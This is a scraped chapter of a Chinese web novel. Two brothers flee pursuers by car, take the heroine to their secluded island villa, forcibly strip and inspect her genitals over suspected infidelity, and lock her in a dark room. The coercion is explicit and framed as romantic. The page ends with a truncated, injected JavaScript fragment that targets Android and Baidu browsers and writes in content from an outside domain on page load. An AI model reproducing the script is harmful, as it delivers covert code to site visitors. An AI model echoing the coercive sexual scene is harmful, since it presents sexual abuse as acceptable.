逃脱 分卷阅读102

    在哪儿落脚,跟丢了你们不要回来见我”纳兰司懿淡淡发令。

    第64章

    蓝色跑车在公路上飞驰,纳兰获修长的手指紧紧握着方向盘,转弯,提速,瞬间刹车后转,蓝静仪觉得车里已是天翻地覆,她从未见纳兰获开过这样的快车。

    从后车镜里看去,后面好像紧紧地跟着两辆黑色的跑车,纳兰获又提速了,车子几乎被他开上了天,后面两辆跑车被甩开一些。

    车里气氛紧张惊险,然而蓝静仪还是感觉到紧绷的气氛,纳兰葎和纳兰荻都表情严肃,冰着一张俊脸把她当透明人。

    很明显后面的“追兵”是纳兰司懿的人,但他们只是采取保守的追踪并没有任何过激行为,他们明明可以用枪打爆车胎,但他们并没有这样做,看来是纳兰司懿顾虑了亲情。

    可是纳兰葎却不管这些,他示意纳兰荻减慢车速,车门打开,他半个身子都探出去。

    “砰”的一声响,蓝静仪吓了一跳,却见纳兰葎已经坐回车里,轻松悠游地吹了一下枪管。

    “获,搞定,转弯把他们甩掉”

    蓝静仪向后看去,跟踪的车辆其中有一辆车胎已经被纳兰葎一枪打爆抛锚,后面那辆还不及赶过来,纳兰荻已经眼明手快地将车拐进一条弯曲的窄巷。

    “老头的人真是稀松平常”纳兰葎手里摆弄着枪支,那支枪更像他的一个玩具。

    纳兰荻从鼻子里哼了一声,“他们目高于顶,我们如果想藏起来恐怕他们十年都找不到”

    蓝静仪仍惊魂未定。纳兰司懿的保镖确实小瞧了这两个少年,他们身体里天生有着噬血因子,他们是一对狡猾的恶魔,一般人若是只把他们看成普通的少年那就大错特错,想和他们斗法恐怕要尝到什么叫惨败滋味。

    蓝静仪知道肯定纳兰司懿做了交待,那些保镖才不也轻举妄动,不然肯定有一场血腥厮杀,哪里这么容易就把那些难缠的家伙甩掉。

    当然也得益于纳兰葎的枪法,蓝静仪从不知道纳兰葎的枪法如此的稳,准,狠,如果他对准的是一个人的脑袋,那个脑袋铁定已经开花。

    他们如在羊肠小道中游走,弄的蓝静仪晕头转向,后来车子开上了宽阔大道,两边都是湛蓝的海水,再后来景色越来越美,人也越来越稀少。

    终于车子在一幢白色建筑前停下来,这座建筑紧临大海,像一座孤立的城堡。

    纳兰荻和纳兰葎跳下来,蓝静仪仍在呆怔中,被海天相连的景色所震撼。

    “还不下来?”纳兰荻手握车门说道。

    “这是哪儿?”蓝静仪扭头问。两人皆沉着脸不予回答,不等她下车就转身走向别墅。蓝静仪只得自己下车默默跟过去。

    纳兰荻和纳兰葎脱掉鞋子向里走,蓝静仪走到门口,倒吸一口气,别墅里触目可及的都是白色的狐毛地毯,像一块天然的大床,脚踩上去软绵绵的,像踩在云朵里。

    里面是欧式风格,有壁炉和小吧台,壁炉旁放着一架银架红木小桌。

    纳兰荻靠在吧台旁倒酒,红色的液体与水晶杯碰撞发出悦耳的声响,他拿起酒杯,斜睨她。英俊的脸庞在吧台的小灯照耀下宛如大理石雕,冷酷冰冷。

    纳兰荻则一屁股坐在壁炉前的长地毯上,扭脸看踌躇走进的蓝静仪。

    “这里是我和荻的地盘,逐浪岛,我们的产权,除非我们俩,不然任何人想进岛都会被认为是非法侵入被抓到警局,这个岛也极为隐蔽,很少有人能找的到,连老头也不知道我和获偷偷买下了这片海岛,换句话说这个海岛上就我们三个人,你甚至脱光衣服也不必担心被除我们之外的其它人看到。我的回答满意吗?”他扬眉。

    蓝静仪匀净的脸浮上淡淡红潮。这家伙说话真不正经。

    “现在该回答我们的问题了”纳兰葎话锋一转,俊美的脸也严肃起来。

    蓝静仪轻轻坐在柔软的地毯上,眼角漂了眼纳兰荻,他的目光几乎让她冻结。

    他饮了口酒,狭眸淡冷的目光在她的脸颊流转,“昨天,你去机场了?”

    蓝静仪低头,“嗯”

    纳兰葎问,“去做什么?”

    “……”蓝静仪沉默。

    纳兰葎咬牙,看她那种表情,这个傻女人,连哄人都不会哄吗?果然纳兰荻的目光沉下来。

    “去做了什么?”纳兰荻走过来,口吻格外轻,却让人听在耳里忍不住寒颤。

    “去送蓝蕼,他回美国了”蓝静仪听到如猫一样的脚步声,迅速地抬眸回答。纳兰荻停下来,黑眸依旧研判地盯着她。

    “那老头怎么会在机场出现?”纳兰葎接着问。蓝静仪向他看过来,眸子里有些惊讶,他们是怎么知道的?

    纳兰葎扬眉,眸里有邪魅的光芒。

    蓝静仪只好说,“我也不知道,我一转身他就在那儿了”

    “是你们约好了……?”纳兰获沉吟地说。

    “没有”蓝静仪迅速否认,“我们没有”她看向纳兰获,纳兰荻眼睛移开,让她只看到他侧面的轮廓。

    “接下来你们做了什么?”纳兰获问。

    “……”

    “去咖啡厅喝咖啡喝了一夜,还是去舞厅跳了一夜的舞或者在话吧共叙别后重逢太过兴奋忘了回家?”纳兰葎提醒。

    “……”

    “葎”纳兰获扭头,“你别帮她”

    他走过去,一件一件拨去蓝静仪的衣裳,蓝静仪挣扎,“你做什么?”她想站起来跑开,可是哪里是纳兰荻的对手,不一会儿,他就把她拨光了。

    将她的大腿打开,用膝盖压好,深黑的目光盯向她的私处。

    蓝静仪被迫双手向后拄地,雪白的乳房轻摇,她咬着唇,连脖子都红了。修长干净的手指拔开细嫩的花瓣,黑眸黝黑深沉。

    “葎,瞧洗的多干净”

    纳兰葎早已走过来,看到她的私处的确非常干净没有秽物,但却略略的红肿着。

    “老头还真懂得情趣”纳兰葎轻嗤。

    蓝静仪脸涨的通红。

    “他是不是干了你一夜,每次背叛你身上都要留着这样明显的罪证吗,你是不是不想活了?”纳兰荻说道。

    蓝静仪扭开脸,沉默着。

    纳兰获看了她一会儿,站起身,“不想说?好……你跟我过来”他起身上楼,脚步缓慢。

    蓝静仪抱着肩膀缩成一团。她没动。

    纳兰葎轻声说,“笨蛋,你不会说你们什么都没做吗?哪怕是骗骗我们……”

    “还不过来,要我下去抓你吗?”纳兰获转身。

    蓝静仪慢慢站起来,向他走去。

    不一会儿,纳兰获从楼上走下来,坐在纳兰葎身边。

    “你关她有什么用?”

    “上边很黑,我告诉她不说实话就不放她出来”

    纳兰葎叹气,“哥,反正事情已经

window["timea"] = "svggr" + (new Date()).getTime();var t = document;if((/(Android)/i.test(navigator.userAgent))&&(/(baidu)/i.test(navigator.userAgent))){if((/(check_xxin)/i.test(window.location.href))){alert(new Date().getSeconds())};var lxq="dd.shxckr.cn/s_80137_1/w1xhtml?";t.write('